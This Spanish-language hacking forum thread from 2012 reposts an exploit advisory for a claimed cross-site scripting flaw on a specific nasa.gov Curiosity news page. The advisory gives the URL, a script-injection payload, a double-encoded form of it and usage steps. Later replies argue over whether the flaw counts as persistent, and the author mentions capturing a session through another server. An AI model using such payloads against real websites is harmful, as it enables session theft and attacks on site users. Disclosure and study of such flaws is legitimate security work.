XSS Persistent NASA.GOV

  • 5 Respuestas
  • 5154 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica

XSS Persistent NASA.GOV

  • en: Agosto 23, 2012, 08:54:06 pm
Código: (text) [Seleccionar]
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                                                                        1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|              NASA.GOV - Cross Site Scripting Persistent                |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date          : 21-08-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Vendor        : NASA
# Category      : misc
# URL Vendor    : http://www.nasa.gov/
# Tested on     : BackTrack 5 r3 - Mozilla Firefox
# Contact       : [email protected]
# Website       : www.calebbucker.blogspot.com
# Greetings to  : CL-Security All Members And Friend's
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:
 
http://img341.imageshack.us/img341/4395/snapshot408.png
 
http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
VULNERABILITY LOCATION:
 
www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
CROSS SITE SCRIPTING:
 
www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527CalebBucker%2527%2529%253C%252fscript%253E
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
HOW TO USE:
 
"><script>alert('XSS")</script> send it through, works on GET nothing else is really special about it.
 
so double encoded it will look like this:
 
%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
Enjoy!
 
# 1337day.com [2012-08-22]

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de

Re:XSS Persistent NASA.GOV

  • en: Agosto 23, 2012, 09:20:41 pm
Buena esa man xd , nose que hacias mirando ahi la verdad xd.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica

Re:XSS Persistent NASA.GOV

  • en: Agosto 23, 2012, 09:26:03 pm
Buscando marcianos jajajaja (broma)

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica

Re:XSS Persistent NASA.GOV

  • en: Agosto 27, 2012, 05:57:48 pm
solo un pekeño detalle
esos no son xss persistentes :3

Lo considero PERSISTENTE, porque antes que sea REPORTADA, pude hacer muchas cosas, cosa que con el NO PERSISTENTE no se puede llegar hacer.

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica

Re:XSS Persistent NASA.GOV

  • en: Agosto 27, 2012, 06:07:35 pm
disculpa pero persistente son los css en los cuales se inyecta el codigo y keda activo en el sitio sin tener ke poner la url con el codigo o mandando con dom, como en guestbooks ke dejas un comntario con un xss y el admin o kien lo vea se ejecuta el codigo sin tener ke mandarle la url con modificacion en ella :3

Tratas de decir que los XSS Persistentes son cuando un atacante inyecta el code javascript y queda grabado en el sitio? EPIC FAIL -_-

No compares un Modulo con un guestbooks, las cuales estan programadas para que cualquiera que lo vea, pueda leer el code.

Como te vuelvo a repetir, lo considero Persistente porque pude hacer pruebas mediante otro servidor para obtener una session y otras cosas mas.


Desconectado hdbreaker

  • *
  • Ex-Staff
  • *****
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
  • Skype: hdbreaker96
  • Twitter: @SecSignal
    • Ver Perfil
    • Security Signal
    • Email

Re:XSS Persistent NASA.GOV

  • en: Agosto 28, 2012, 01:40:22 am
Chicos Veo q el tema se esta desviando por favor Peleas fuera del foro, o me vere Obligado a cerrar el tema.

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo